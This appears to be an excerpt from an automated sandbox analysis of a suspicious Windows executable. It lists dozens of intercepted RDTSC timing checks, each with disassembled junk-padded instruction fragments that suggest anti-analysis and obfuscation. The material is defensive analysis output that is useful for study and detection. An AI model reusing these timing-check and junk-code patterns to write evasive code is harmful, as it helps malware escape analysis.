Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C4629 second address: 15C462D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C462D second address: 15C4652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007F9D01181AAEh 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C4652 second address: 15C4683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F9D00F1DB5Dh 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jne 00007F9D00F1DB5Eh 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C4B13 second address: 15C4B1D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9D01181AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C4B1D second address: 15C4B27 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9D00F1DB5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C5403 second address: 15C5414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jl 00007F9D01181AA6h 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C5509 second address: 15C550F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C550F second address: 15C5515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C5515 second address: 15C5519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C5519 second address: 15C551D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C55AA second address: 15C55AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C55AF second address: 15C55B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C56DF second address: 15C56E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F9D00F1DB56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C5DA7 second address: 15C5DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C6715 second address: 15C6747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D00F1DB62h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C6747 second address: 15C67A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a xor esi, dword ptr [ebp+124464B6h] 0x00000010 mov dword ptr [ebp+122D1C53h], ecx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F9D01181AA8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push 00000000h 0x00000034 xor si, F19Ah 0x00000039 xchg eax, ebx 0x0000003a push ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C67A3 second address: 15C67A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C67A7 second address: 15C67AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C7861 second address: 15C7865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C9F8D second address: 15C9F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C9F93 second address: 15C9FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F9D00F1DB68h 0x0000000b jmp 00007F9D00F1DB62h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15CAD38 second address: 15CAD3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C9FB7 second address: 15C9FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15CAD3E second address: 15CAD42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15CAD42 second address: 15CAD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jc 00007F9D00F1DB5Ch 0x0000000f add edi, dword ptr [ebp+122D26AFh] 0x00000015 push 00000000h 0x00000017 sub dword ptr [ebp+122D2588h], edx 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F9D00F1DB58h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b pushad 0x0000003c push edi 0x0000003d pop edi 0x0000003e jo 00007F9D00F1DB56h 0x00000044 popad 0x00000045 push esi 0x00000046 jnp 00007F9D00F1DB56h 0x0000004c pop esi 0x0000004d popad 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 push ebx 0x00000053 pop ebx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15CCC05 second address: 15CCC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15CCC0C second address: 15CCC19 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15CCC19 second address: 15CCC26 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9D01181AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15CFD16 second address: 15CFD39 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9D00F1DB56h 0x00000008 jmp 00007F9D00F1DB64h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15D2344 second address: 15D2348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15D2348 second address: 15D2356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F9D00F1DB56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1580815 second address: 1580821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15D24BF second address: 15D2588 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F9D00F1DB58h 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F9D00F1DB58h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 jmp 00007F9D00F1DB64h 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov dword ptr [ebp+1247ED06h], ebx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 jc 00007F9D00F1DB6Fh 0x00000047 call 00007F9D00F1DB62h 0x0000004c mov dword ptr [ebp+122D35B2h], edi 0x00000052 pop edi 0x00000053 mov eax, dword ptr [ebp+122D09E5h] 0x00000059 or edi, dword ptr [ebp+122D3695h] 0x0000005f push FFFFFFFFh 0x00000061 call 00007F9D00F1DB66h 0x00000066 mov bl, EDh 0x00000068 pop edi 0x00000069 nop 0x0000006a pushad 0x0000006b jo 00007F9D00F1DB58h 0x00000071 push eax 0x00000072 pop eax 0x00000073 pushad 0x00000074 jmp 00007F9D00F1DB65h 0x00000079 jbe 00007F9D00F1DB56h 0x0000007f popad 0x00000080 popad 0x00000081 push eax 0x00000082 push edi 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1580821 second address: 1580827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D2588 second address: 15D258C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1580827 second address: 158082B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D684A second address: 15D6882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB68h 0x00000009 pop esi 0x0000000a jp 00007F9D00F1DB58h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push edi 0x00000013 jmp 00007F9D00F1DB60h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D6882 second address: 15D68A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jmp 00007F9D01181AB7h 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D6ECD second address: 15D6ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D7F92 second address: 15D7F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D9CC2 second address: 15D9CE2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9D00F1DB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F9D00F1DB61h 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D9CE2 second address: 15D9D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 xor dword ptr [ebp+122D2072h], eax 0x0000000d push 00000000h 0x0000000f sub dword ptr [ebp+122D1BA4h], ecx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F9D01181AA8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D1D7Eh], eax 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 pushad 0x0000003a jmp 00007F9D01181AB5h 0x0000003f jnp 00007F9D01181AA6h 0x00000045 popad 0x00000046 pushad 0x00000047 jg 00007F9D01181AA6h 0x0000004d jmp 00007F9D01181AB2h 0x00000052 popad 0x00000053 popad 0x00000054 push eax 0x00000055 pushad 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D9D60 second address: 15D9D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DAC9C second address: 15DACB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DACB7 second address: 15DACBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DAE4F second address: 15DAE55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DAE55 second address: 15DAE59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DBEE1 second address: 15DBEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DBEE5 second address: 15DBEF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15E1091 second address: 15E10AF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9D01181AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jmp 00007F9D01181AAEh 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15E10AF second address: 15E10B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9D00F1DB56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DDF2E second address: 15DDF40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DDF40 second address: 15DDF45 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15E229A second address: 15E229E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15E235B second address: 15E2360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15E2360 second address: 15E2366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DCE83 second address: 15DCE94 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F9D00F1DB56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15E94FA second address: 15E94FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15EC3B9 second address: 15EC3BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F0DA4 second address: 15F0DC7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F9D01181AA6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F9D01181AB3h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F0DC7 second address: 15F0DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9D00F1DB56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F39A3 second address: 15F39A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F9480 second address: 15F9484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F81F4 second address: 15F8227 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F9D01181AB6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F8227 second address: 15F8236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Ah 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F8236 second address: 15F825B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9D01181AB2h 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 jp 00007F9D01181AA6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F825B second address: 15F8265 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9D00F1DB5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F883A second address: 15F8841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F8841 second address: 15F8857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F9D00F1DB56h 0x00000009 jp 00007F9D00F1DB56h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F8857 second address: 15F885B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F885B second address: 15F885F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F885F second address: 15F8872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9D01181AA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F8DF8 second address: 15F8DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F9343 second address: 15F935B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 js 00007F9D01181AA6h 0x0000000d jp 00007F9D01181AA6h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CD5AA second address: 15CD5B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CDB9F second address: 15CDBF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9D01181AB6h 0x0000000a jmp 00007F9D01181AB0h 0x0000000f popad 0x00000010 xor dword ptr [esp], 45430C82h 0x00000017 or dl, 00000077h 0x0000001a mov dword ptr [ebp+122D1B08h], edx 0x00000020 call 00007F9D01181AA9h 0x00000025 jbe 00007F9D01181ABAh 0x0000002b jmp 00007F9D01181AB4h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push edi 0x00000034 jbe 00007F9D01181AA6h 0x0000003a pop edi 0x0000003b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CDBF8 second address: 15CDC3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jmp 00007F9D00F1DB68h 0x00000014 jmp 00007F9D00F1DB66h 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CDC3C second address: 15CDC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F9D01181AA8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push edi 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CDF05 second address: 15CDF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9D00F1DB56h 0x0000000a popad 0x0000000b pop edi 0x0000000c mov eax, dword ptr [eax] 0x0000000e jns 00007F9D00F1DB71h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b push edi 0x0000001c pop edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE050 second address: 15CE05A instructions: 0x00000000 rdtsc 0x00000002 je 00007F9D01181AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE05A second address: 15CE05F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
